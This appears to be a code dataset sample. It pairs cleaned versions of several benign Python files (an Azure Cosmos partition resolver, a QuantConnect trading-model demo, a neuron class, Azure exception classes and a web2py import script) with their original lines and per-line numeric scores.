            The dictionary of ranges mapped to their associated collection.
        """
        if partition_key_extractor is None:
            raise ValueError("partition_key_extractor is None.")
        if partition_map is None:
            raise ValueError("partition_map is None.")

        self.partition_key_extractor = partition_key_extractor
        self.partition_map = partition_map

    def ResolveForCreate(self, document):
        """Resolves the collection for creating the document based on its
        partition key.

        :param dict document:
            The document to be created.

        :return:
            Collection Self link or Name based link which should handle the
            Create operation.
        :rtype:
            str
        """
        if document is None:
            raise ValueError("document is None.")

        partition_key = self.partition_key_extractor(document)
        containing_range = self._GetContainingRange(partition_key)
        if containing_range is None:
            raise ValueError("A containing range for " + str(partition_key) + " doesn't exist in the partition map.")
        return self.partition_map.get(containing_range)

    def ResolveForRead(self, partition_key):
        """Resolves the collection(s) for reading/querying documents based on
        the partition key.

        :param dict document:
            The document to be read/queried.

        :return:
            Collection Self link(s) or Name based link(s) which should handle
            the Read operation.
        :rtype:
            list
        """
        links = []
        for key_range in self._GetIntersectingRanges(partition_key):
            links.append(self.partition_map.get(key_range))
        return links

    def _GetContainingRange(self, partition_key):
        """Returns the first mapped range containing the partition key,
        or None when no mapped range contains it.
        """
        return next(
            (r for r in self.partition_map.keys() if r.Contains(partition_key)),
            None)

    def _GetIntersectingRanges(self, partition_key):
        """Returns the mapped ranges that intersect the partition key.

        A None key (or a None element inside a list key) matches every
        mapped range.
        """
        if partition_key is None:
            return list(self.partition_map.keys())

        # Normalize the key into a set of Range objects to test against.
        if isinstance(partition_key, prange.Range):
            key_ranges = {partition_key}
        elif isinstance(partition_key, list):
            key_ranges = set()
            for key in partition_key:
                if key is None:
                    return list(self.partition_map.keys())
                if isinstance(key, prange.Range):
                    key_ranges.add(key)
                else:
                    key_ranges.add(prange.Range(key, key))
        else:
            key_ranges = {prange.Range(partition_key, partition_key)}

        intersecting = set()
        for candidate in key_ranges:
            for mapped in self.partition_map.keys():
                if mapped.Intersect(candidate):
                    intersecting.add(mapped)
        return intersecting
[ "#The MIT License (MIT)\n", "#Copyright (c) 2014 Microsoft Corporation\n", "\n", "#Permission is hereby granted, free of charge, to any person obtaining a copy\n", "#of this software and associated documentation files (the \"Software\"), to deal\n", "#in the Software without restriction, including without limitation the rights\n", "#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n", "#copies of the Software, and to permit persons to whom the Software is\n", "#furnished to do so, subject to the following conditions:\n", "\n", "#The above copyright notice and this permission notice shall be included in all\n", "#copies or substantial portions of the Software.\n", "\n", "#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n", "#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n", "#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n", "#SOFTWARE.\n", "\n", "\"\"\"Range partition resolver implementation in the Azure Cosmos database service.\n", "\"\"\"\n", "\n", "import azure.cosmos.range as prange\n", "\n", "class RangePartitionResolver(object):\n", " \"\"\"RangePartitionResolver implements partitioning based on the ranges, allowing you to\n", " distribute requests and data across a number of partitions.\n", " \"\"\"\n", " def __init__(self, partition_key_extractor, partition_map):\n", " \"\"\"\n", " :param lambda partition_key_extractor:\n", " Returning the partition key from the document passed.\n", " :param dict partition_map:\n", " The dictionary of ranges mapped to their associated collection\n", " \"\"\"\n", " if partition_key_extractor is None:\n", " raise ValueError(\"partition_key_extractor is None.\")\n", " if 
partition_map is None:\n", " raise ValueError(\"partition_map is None.\")\n", "\n", " self.partition_key_extractor = partition_key_extractor\n", " self.partition_map = partition_map\n", "\n", " def ResolveForCreate(self, document):\n", " \"\"\"Resolves the collection for creating the document based on the partition key.\n", "\n", " :param dict document:\n", " The document to be created.\n", "\n", " :return:\n", " Collection Self link or Name based link which should handle the Create operation.\n", " :rtype:\n", " str\n", " \"\"\"\n", " if document is None:\n", " raise ValueError(\"document is None.\")\n", "\n", " partition_key = self.partition_key_extractor(document)\n", " containing_range = self._GetContainingRange(partition_key)\n", " \n", " if containing_range is None:\n", " raise ValueError(\"A containing range for \" + str(partition_key) + \" doesn't exist in the partition map.\")\n", " \n", " return self.partition_map.get(containing_range)\n", "\n", " def ResolveForRead(self, partition_key):\n", " \"\"\"Resolves the collection for reading/querying the documents based on the partition key.\n", "\n", " :param dict document:\n", " The document to be read/queried.\n", "\n", " :return:\n", " Collection Self link(s) or Name based link(s) which should handle the Read operation.\n", " :rtype:\n", " list\n", " \"\"\"\n", " intersecting_ranges = self._GetIntersectingRanges(partition_key)\n", "\n", " collection_links = list()\n", " for keyrange in intersecting_ranges:\n", " collection_links.append(self.partition_map.get(keyrange))\n", "\n", " return collection_links\n", "\n", " def _GetContainingRange(self, partition_key):\n", " \"\"\"Gets the containing range based on the partition key.\n", " \"\"\"\n", " for keyrange in self.partition_map.keys():\n", " if keyrange.Contains(partition_key):\n", " return keyrange\n", "\n", " return None\n", "\n", " def _GetIntersectingRanges(self, partition_key):\n", " \"\"\"Gets the intersecting ranges based on the partition key.\n", " 
\"\"\"\n", " partitionkey_ranges = set()\n", " intersecting_ranges = set()\n", "\n", " if partition_key is None:\n", " return list(self.partition_map.keys())\n", "\n", " if isinstance(partition_key, prange.Range):\n", " partitionkey_ranges.add(partition_key)\n", " elif isinstance(partition_key, list):\n", " for key in partition_key:\n", " if key is None:\n", " return list(self.partition_map.keys())\n", " elif isinstance(key, prange.Range):\n", " partitionkey_ranges.add(key)\n", " else:\n", " partitionkey_ranges.add(prange.Range(key, key))\n", " else:\n", " partitionkey_ranges.add(prange.Range(partition_key, partition_key))\n", "\n", " for partitionKeyRange in partitionkey_ranges:\n", " for keyrange in self.partition_map.keys():\n", " if keyrange.Intersect(partitionKeyRange):\n", " intersecting_ranges.add(keyrange)\n", "\n", " return intersecting_ranges" ]
[ 0.043478260869565216, 0.023809523809523808, 0, 0.01282051282051282, 0.012658227848101266, 0.01282051282051282, 0.013333333333333334, 0.014084507042253521, 0.017241379310344827, 0, 0.0125, 0.02040816326530612, 0, 0.013157894736842105, 0.013513513513513514, 0.012987012987012988, 0.013888888888888888, 0.012658227848101266, 0.012658227848101266, 0.09090909090909091, 0, 0.012345679012345678, 0, 0, 0, 0, 0.02631578947368421, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011235955056179775, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0.00847457627118644, 0.1111111111111111, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.029411764705882353 ]
123
0.005731
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from clr import AddReference
AddReference("System")
AddReference("QuantConnect.Algorithm")
AddReference("QuantConnect.Common")

from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Orders import *
from QuantConnect.Orders.Fees import *
from QuantConnect.Securities import *
from QuantConnect.Orders.Fills import *
import numpy as np
import random

### <summary>
### Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting.
### QuantConnect allows you to model all orders as deeply and accurately as you need.
### </summary>
### <meta name="tag" content="trading and orders" />
### <meta name="tag" content="transaction fees and slippage" />
### <meta name="tag" content="custom buying power models" />
### <meta name="tag" content="custom transaction models" />
### <meta name="tag" content="custom slippage models" />
### <meta name="tag" content="custom fee models" />
class CustomModelsAlgorithm(QCAlgorithm):
    '''Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting.
    QuantConnect allows you to model all orders as deeply and accurately as you need.'''

    def Initialize(self):
        self.SetStartDate(2013,10,1)   # Set Start Date
        self.SetEndDate(2013,10,31)    # Set End Date
        self.security = self.AddEquity("SPY", Resolution.Hour)
        self.spy = self.security.Symbol

        # Wire up all four custom transaction models on the security.
        self.security.SetFeeModel(CustomFeeModel(self))
        self.security.SetFillModel(CustomFillModel(self))
        self.security.SetSlippageModel(CustomSlippageModel(self))
        self.security.SetBuyingPowerModel(CustomBuyingPowerModel(self))

    def OnData(self, data):
        # Do nothing while an order is still working.
        if len(self.Transactions.GetOpenOrders(self.spy)) != 0:
            return

        holdings = self.security.Holdings.Quantity
        if self.Time.day > 10 and holdings <= 0:
            target = self.CalculateOrderQuantity(self.spy, .5)
            self.Log(f"MarketOrder: {target}")
            self.MarketOrder(self.spy, target, True)   # async needed for partial fill market orders
        elif self.Time.day > 20 and holdings >= 0:
            target = self.CalculateOrderQuantity(self.spy, -.5)
            self.Log(f"MarketOrder: {target}")
            self.MarketOrder(self.spy, target, True)   # async needed for partial fill market orders

# If we want to use methods from other models, you need to inherit from one of them
class CustomFillModel(ImmediateFillModel):
    def __init__(self, algorithm):
        self.algorithm = algorithm
        # order id -> quantity still unfilled across partial fills
        self.absoluteRemainingByOrderId = {}
        self.random = Random(387510346)

    def MarketFill(self, asset, order):
        # Remaining quantity defaults to the full order on first sight.
        remaining = self.absoluteRemainingByOrderId.get(order.Id, order.AbsoluteQuantity)

        fill = super().MarketFill(asset, order)
        # Fill a random portion, capped at what is still outstanding.
        filled = int(min(remaining, self.random.Next(0, 2*int(order.AbsoluteQuantity))))
        fill.FillQuantity = np.sign(order.Quantity) * filled

        if remaining == filled:
            fill.Status = OrderStatus.Filled
            if self.absoluteRemainingByOrderId.get(order.Id):
                self.absoluteRemainingByOrderId.pop(order.Id)
        else:
            self.absoluteRemainingByOrderId[order.Id] = remaining - filled
            fill.Status = OrderStatus.PartiallyFilled

        self.algorithm.Log(f"CustomFillModel: {fill}")
        return fill

class CustomFeeModel(FeeModel):
    def __init__(self, algorithm):
        self.algorithm = algorithm

    def GetOrderFee(self, parameters):
        # custom fee math: proportional to notional, floored at 1.
        raw = parameters.Security.Price * parameters.Order.AbsoluteQuantity * 0.00001
        fee = max(1, raw)
        self.algorithm.Log(f"CustomFeeModel: {fee}")
        return OrderFee(CashAmount(fee, "USD"))

class CustomSlippageModel:
    def __init__(self, algorithm):
        self.algorithm = algorithm

    def GetSlippageApproximation(self, asset, order):
        # custom slippage math: grows with the log of the order size.
        slippage = asset.Price * 0.0001 * np.log10(2 * float(order.AbsoluteQuantity))
        self.algorithm.Log(f"CustomSlippageModel: {slippage}")
        return slippage

class CustomBuyingPowerModel(BuyingPowerModel):
    def __init__(self, algorithm):
        self.algorithm = algorithm

    def HasSufficientBuyingPowerForOrder(self, parameters):
        # custom behavior: this model will assume that there is always enough buying power
        result = HasSufficientBuyingPowerForOrderResult(True)
        self.algorithm.Log(f"CustomBuyingPowerModel: {result.IsSufficient}")
        return result
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Orders import *\n", "from QuantConnect.Orders.Fees import *\n", "from QuantConnect.Securities import *\n", "from QuantConnect.Orders.Fills import *\n", "import numpy as np\n", "import random\n", "\n", "### <summary>\n", "### Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting.\n", "### QuantConnect allows you to model all orders as deeply and accurately as you need.\n", "### </summary>\n", "### <meta name=\"tag\" content=\"trading and orders\" />\n", "### <meta name=\"tag\" content=\"transaction fees and slippage\" />\n", "### <meta name=\"tag\" content=\"custom buying power models\" />\n", "### <meta name=\"tag\" content=\"custom transaction models\" />\n", "### <meta name=\"tag\" content=\"custom slippage models\" />\n", "### <meta name=\"tag\" content=\"custom fee models\" />\n", "class CustomModelsAlgorithm(QCAlgorithm):\n", " '''Demonstration of using custom fee, slippage, fill, 
and buying power models for modelling transactions in backtesting.\n", " QuantConnect allows you to model all orders as deeply and accurately as you need.'''\n", "\n", " def Initialize(self):\n", " self.SetStartDate(2013,10,1) # Set Start Date\n", " self.SetEndDate(2013,10,31) # Set End Date\n", " self.security = self.AddEquity(\"SPY\", Resolution.Hour)\n", " self.spy = self.security.Symbol\n", "\n", " # set our models\n", " self.security.SetFeeModel(CustomFeeModel(self))\n", " self.security.SetFillModel(CustomFillModel(self))\n", " self.security.SetSlippageModel(CustomSlippageModel(self))\n", " self.security.SetBuyingPowerModel(CustomBuyingPowerModel(self))\n", "\n", "\n", " def OnData(self, data):\n", " open_orders = self.Transactions.GetOpenOrders(self.spy)\n", " if len(open_orders) != 0: return\n", "\n", " if self.Time.day > 10 and self.security.Holdings.Quantity <= 0:\n", " quantity = self.CalculateOrderQuantity(self.spy, .5)\n", " self.Log(f\"MarketOrder: {quantity}\")\n", " self.MarketOrder(self.spy, quantity, True) # async needed for partial fill market orders\n", "\n", " elif self.Time.day > 20 and self.security.Holdings.Quantity >= 0:\n", " quantity = self.CalculateOrderQuantity(self.spy, -.5)\n", " self.Log(f\"MarketOrder: {quantity}\")\n", " self.MarketOrder(self.spy, quantity, True) # async needed for partial fill market orders\n", "\n", "# If we want to use methods from other models, you need to inherit from one of them\n", "class CustomFillModel(ImmediateFillModel):\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", " self.absoluteRemainingByOrderId = {}\n", " self.random = Random(387510346)\n", "\n", " def MarketFill(self, asset, order):\n", " absoluteRemaining = order.AbsoluteQuantity\n", "\n", " if order.Id in self.absoluteRemainingByOrderId.keys():\n", " absoluteRemaining = self.absoluteRemainingByOrderId[order.Id]\n", "\n", " fill = super().MarketFill(asset, order)\n", " absoluteFillQuantity = int(min(absoluteRemaining, 
self.random.Next(0, 2*int(order.AbsoluteQuantity))))\n", " fill.FillQuantity = np.sign(order.Quantity) * absoluteFillQuantity\n", " \n", " if absoluteRemaining == absoluteFillQuantity:\n", " fill.Status = OrderStatus.Filled\n", " if self.absoluteRemainingByOrderId.get(order.Id):\n", " self.absoluteRemainingByOrderId.pop(order.Id)\n", " else:\n", " absoluteRemaining = absoluteRemaining - absoluteFillQuantity\n", " self.absoluteRemainingByOrderId[order.Id] = absoluteRemaining\n", " fill.Status = OrderStatus.PartiallyFilled\n", " self.algorithm.Log(f\"CustomFillModel: {fill}\")\n", " return fill\n", "\n", "class CustomFeeModel(FeeModel):\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", "\n", " def GetOrderFee(self, parameters):\n", " # custom fee math\n", " fee = max(1, parameters.Security.Price\n", " * parameters.Order.AbsoluteQuantity\n", " * 0.00001)\n", " self.algorithm.Log(f\"CustomFeeModel: {fee}\")\n", " return OrderFee(CashAmount(fee, \"USD\"))\n", "\n", "class CustomSlippageModel:\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", "\n", " def GetSlippageApproximation(self, asset, order):\n", " # custom slippage math\n", " slippage = asset.Price * 0.0001 * np.log10(2*float(order.AbsoluteQuantity))\n", " self.algorithm.Log(f\"CustomSlippageModel: {slippage}\")\n", " return slippage\n", "\n", "class CustomBuyingPowerModel(BuyingPowerModel):\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", "\n", " def HasSufficientBuyingPowerForOrder(self, parameters):\n", " # custom behavior: this model will assume that there is always enough buying power\n", " hasSufficientBuyingPowerForOrderResult = HasSufficientBuyingPowerForOrderResult(True)\n", " self.algorithm.Log(f\"CustomBuyingPowerModel: {hasSufficientBuyingPowerForOrderResult.IsSufficient}\")\n", " return hasSufficientBuyingPowerForOrderResult" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.02702702702702703, 0.029411764705882353, 0.02564102564102564, 0.02631578947368421, 0.025, 0.05263157894736842, 0.07142857142857142, 0, 0.07142857142857142, 0.01639344262295082, 0.023255813953488372, 0.06666666666666667, 0.018867924528301886, 0.015625, 0.01639344262295082, 0.016666666666666666, 0.017543859649122806, 0.019230769230769232, 0.023809523809523808, 0.008, 0.011235955056179775, 0, 0, 0.03571428571428571, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.024390243902439025, 0, 0, 0, 0, 0.009708737864077669, 0, 0, 0, 0, 0.009708737864077669, 0, 0.011904761904761904, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0.1111111111111111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0.020833333333333332, 0, 0, 0, 0, 0.01098901098901099, 0.010638297872340425, 0.009174311926605505, 0.018867924528301886 ]
128
0.008981
false
from python.src.neurons.neurons import Neuron
from python.src.neurons.activation_functions.tanh_activation import TanhActivation
from python.src.neurons.activation_functions.sigmoid_activation import SigmoidActivation
from python.src.neurons.activation_functions.sine_activation import SineActivation


# This neuron model requires all inbound signals to have been received
# before it activates and sends on any of its connections.
class ReceiveAllNeuron(Neuron):
    def __init__(self, activation=None):
        """Create the neuron.

        :param activation: activation function; defaults to a fresh
            SineActivation per instance.  (The old default of
            ``activation=SineActivation()`` was evaluated once at def time,
            so every neuron constructed without an explicit activation
            silently shared a single activation object.)
        """
        # Call inherited class.
        Neuron.__init__(self, SineActivation() if activation is None else activation)
        # connection.id -> True once that connection's signal has arrived
        self.signal_receivedTracker = {}

    def on_reset(self):
        # Gets the neuron ready to fire again.
        for key in self.signal_receivedTracker:
            self.signal_receivedTracker[key] = False

    def on_inbound_added(self, connection):
        self.signal_receivedTracker[connection.id] = False

    def on_inbound_removed(self, connection):
        self.signal_receivedTracker.pop(connection.id, None)

    def on_signal_received(self, value, connection_id):
        # Ignore duplicate signals from a connection we have already heard
        # from.  Using .get avoids the KeyError the previous direct lookup
        # raised for ids (e.g. None) that were never registered, which the
        # `if connection_id:` guard below clearly expects to be possible.
        if self.signal_receivedTracker.get(connection_id):
            return

        if connection_id:
            self.signal_receivedTracker[connection_id] = True

        if not self.allSignalsReceived():
            return

        # All inputs are in: set the output and fire the node.
        self.output = self.activation.fn(self.accumulated_input_signals)
        self.fire()

    def allSignalsReceived(self):
        return all(self.signal_receivedTracker.values())
[ "from python.src.neurons.neurons import Neuron\n", "from python.src.neurons.activation_functions.tanh_activation import TanhActivation\n", "from python.src.neurons.activation_functions.sigmoid_activation import SigmoidActivation\n", "from python.src.neurons.activation_functions.sine_activation import SineActivation\n", "\n", "\n", "\n", "# This type is like most models. It requires all of the\n", "# signals to have been received before sending any of\n", "# its connections.\n", "class ReceiveAllNeuron(Neuron):\n", " def __init__(self, activation = SineActivation()):\n", " # Call inherited class.\n", " Neuron.__init__(self, activation)\n", " self.signal_receivedTracker = {}\n", "\n", "\n", " def on_reset(self):\n", " # gets the neruon ready to fire again\n", " for key in self.signal_receivedTracker:\n", " self.signal_receivedTracker[key] = False\n", "\n", "\n", " def on_inbound_added(self, connection):\n", " self.signal_receivedTracker[connection.id] = False\n", "\n", "\n", " def on_inbound_removed(self, connection):\n", " self.signal_receivedTracker.pop(connection.id, None)\n", "\n", "\n", " def on_signal_received(self, value, connection_id):\n", " # If all signals have been received, the output is set\n", " # and the node fires. \n", " if (len(self.signal_receivedTracker) and \n", " self.signal_receivedTracker[connection_id]): return\n", "\n", " if (connection_id):\n", " self.signal_receivedTracker[connection_id] = True\n", "\n", " if (not self.allSignalsReceived()): return\n", " \n", " self.output = self.activation.fn(self.accumulated_input_signals)\n", " self.fire() \n", "\n", "\n", " def allSignalsReceived(self):\n", " return all(self.signal_receivedTracker.values())\n" ]
[ 0, 0.012048192771084338, 0.011235955056179775, 0.012048192771084338, 0, 0, 0, 0.017857142857142856, 0, 0, 0.03125, 0.03636363636363636, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0.017857142857142856, 0, 0.02564102564102564, 0.02, 0.015625, 0, 0, 0, 0, 0.0196078431372549, 0.0625, 0, 0.03571428571428571, 0, 0, 0.029411764705882353, 0 ]
48
0.009027
false
#-------------------------------------------------------------------------
# Copyright (c) Microsoft.  All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------

__author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>'
__version__ = '1.0.0'


class AzureException(Exception):
    """Base class for all Azure service exceptions."""
    pass


class AzureHttpError(AzureException):
    """An Azure error carrying the HTTP response status code.

    Instantiating AzureHttpError directly self-specializes: status 404
    yields an AzureMissingResourceHttpError and status 409 an
    AzureConflictHttpError, so callers can catch the narrower type.
    """

    def __new__(cls, message, status_code, *args, **kwargs):
        if cls is AzureHttpError:
            # Map well-known status codes to their dedicated subclasses.
            specialized = {
                404: AzureMissingResourceHttpError,
                409: AzureConflictHttpError,
            }.get(status_code)
            if specialized is not None:
                cls = specialized
        return AzureException.__new__(cls, message, status_code, *args, **kwargs)

    def __init__(self, message, status_code):
        super(AzureHttpError, self).__init__(message)
        self.status_code = status_code


class AzureConflictHttpError(AzureHttpError):
    """Raised for HTTP 409 (Conflict) responses."""

    def __init__(self, message, status_code):
        super(AzureConflictHttpError, self).__init__(message, status_code)


class AzureMissingResourceHttpError(AzureHttpError):
    """Raised for HTTP 404 (Not Found) responses."""

    def __init__(self, message, status_code):
        super(AzureMissingResourceHttpError, self).__init__(message, status_code)
[ "#-------------------------------------------------------------------------\r\n", "# Copyright (c) Microsoft. All rights reserved.\r\n", "#\r\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n", "# you may not use this file except in compliance with the License.\r\n", "# You may obtain a copy of the License at\r\n", "# http://www.apache.org/licenses/LICENSE-2.0\r\n", "#\r\n", "# Unless required by applicable law or agreed to in writing, software\r\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n", "# See the License for the specific language governing permissions and\r\n", "# limitations under the License.\r\n", "#--------------------------------------------------------------------------\r\n", "\r\n", "__author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>'\r\n", "__version__ = '1.0.0'\r\n", "\r\n", "\r\n", "class AzureException(Exception):\r\n", " pass\r\n", "\r\n", "\r\n", "class AzureHttpError(AzureException):\r\n", " def __init__(self, message, status_code):\r\n", " super(AzureHttpError, self).__init__(message)\r\n", " self.status_code = status_code\r\n", "\r\n", " def __new__(cls, message, status_code, *args, **kwargs):\r\n", " if cls is AzureHttpError:\r\n", " if status_code == 404:\r\n", " cls = AzureMissingResourceHttpError\r\n", " elif status_code == 409:\r\n", " cls = AzureConflictHttpError\r\n", " return AzureException.__new__(cls, message, status_code, *args, **kwargs)\r\n", "\r\n", "\r\n", "class AzureConflictHttpError(AzureHttpError):\r\n", " def __init__(self, message, status_code):\r\n", " super(AzureConflictHttpError, self).__init__(message, status_code)\r\n", "\r\n", "\r\n", "class AzureMissingResourceHttpError(AzureHttpError):\r\n", " def __init__(self, message, status_code):\r\n", " super(AzureMissingResourceHttpError, self).__init__(message, status_code)\r\n" ]
[ 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338 ]
45
0.001116
false
# -*- coding: utf-8 -*-
import cPickle as pickle

# Processes admin import_job records in the 'import' state: the lines have
# already been validated and the user has chosen which ones to ignore; the
# remaining flagged lines are inserted through a SQLFORM so the model's
# validators run once more on the way in.
#

for job in db(db.admin_import_job.status == 'import').select():
    # Validation/insertion form for the job's target table.
    form = SQLFORM(db['%s_%s' % (job.module, job.resource)])

    # Every line of this job flagged for import.
    flagged = db((db.admin_import_line.import_job == job.id) &
                 (db.admin_import_line.status == 'import')).select()
    imported_lines = 0
    failed_lines = 0
    for line in flagged:
        # Invalid lines are skipped outright.
        if not line.valid:
            failed_lines += 1
            continue

        # Recover the pickled row data.
        try:
            data = pickle.loads(line.data)
        except pickle.UnpicklingError:
            failed_lines += 1
            db.admin_import_line[line.id] = dict(
                errors='Could not unpickle data')
            continue

        # Attempt the insert through the form.
        data.update({'_formname': 'import'})
        if form.accepts(data, None, formname='import'):
            db.admin_import_line[line.id] = dict(
                status='imported',
                errors=None)
            imported_lines += 1
        else:
            failed_lines += 1
            db.admin_import_line[line.id] = dict(
                errors='Import Failed: %s' % ', '.join(form.errors))

    # Any failure puts the job back into 'processed' so the user can
    # examine it further; otherwise mark it fully imported.
    new_status = 'imported' if not failed_lines else 'processed'
    db(db.admin_import_job.id == job.id).update(status=new_status)

# Explicitly commit DB operations when running from Cron.
db.commit()
[ "# -*- coding: utf-8 -*-\n", "import cPickle as pickle\n", "\n", "# This script processes import_job records from the admin module that are in the\n", "# 'import' state. This indicates that the lines have been validated, and the user\n", "# has selected any to be ignored, the remaining lines should be imported.\n", "#\n", "\n", "jobs = db(db.admin_import_job.status == 'import').select()\n", "for job in jobs:\n", " # Create a form to use for validation and insertion.\n", " form = SQLFORM(db['%s_%s' % (job.module, job.resource)])\n", "\n", " # Loop over each line flagged for import\n", " lines = db((db.admin_import_line.import_job==job.id) &\n", " (db.admin_import_line.status == 'import')).select()\n", " imported_lines = 0\n", " failed_lines = 0\n", " for line in lines:\n", " if not line.valid:\n", " # Skip invalid lines.\n", " failed_lines += 1\n", " continue\n", "\n", " # Extract pickled data.\n", " try:\n", " data = pickle.loads(line.data)\n", " except pickle.UnpicklingError:\n", " failed_lines += 1\n", " db.admin_import_line[line.id] = dict(\n", " errors = 'Could not unpickle data')\n", " continue\n", " \n", " # Try and insert.\n", " data.update({'_formname': 'import'})\n", " if form.accepts(data, None, formname='import'):\n", " db.admin_import_line[line.id] = dict(\n", " status = 'imported',\n", " errors = None)\n", " imported_lines += 1\n", " else:\n", " db.admin_import_line[line.id] = dict(\n", " errors = 'Import Failed: %s' % ', '.join(form.errors))\n", " failed_lines += 1\n", "\n", "\n", " # Update job status.\n", " if not failed_lines:\n", " db(db.admin_import_job.id==job.id).update(status='imported')\n", " else:\n", " # If one or more lines failed, put back into processed state,\n", " # for user to examine further.\n", " db(db.admin_import_job.id==job.id).update(status='processed')\n", "\n", "# Explicitly commit DB operations when running from Cron\n", "db.commit()\n" ]
[ 0, 0, 0, 0.012345679012345678, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.1111111111111111, 0, 0, 0, 0, 0.04878048780487805, 0.05714285714285714, 0, 0, 0, 0.02666666666666667, 0, 0, 0, 0.04, 0, 0.014492753623188406, 0, 0, 0, 0.014285714285714285, 0, 0, 0 ]
56
0.006959
false
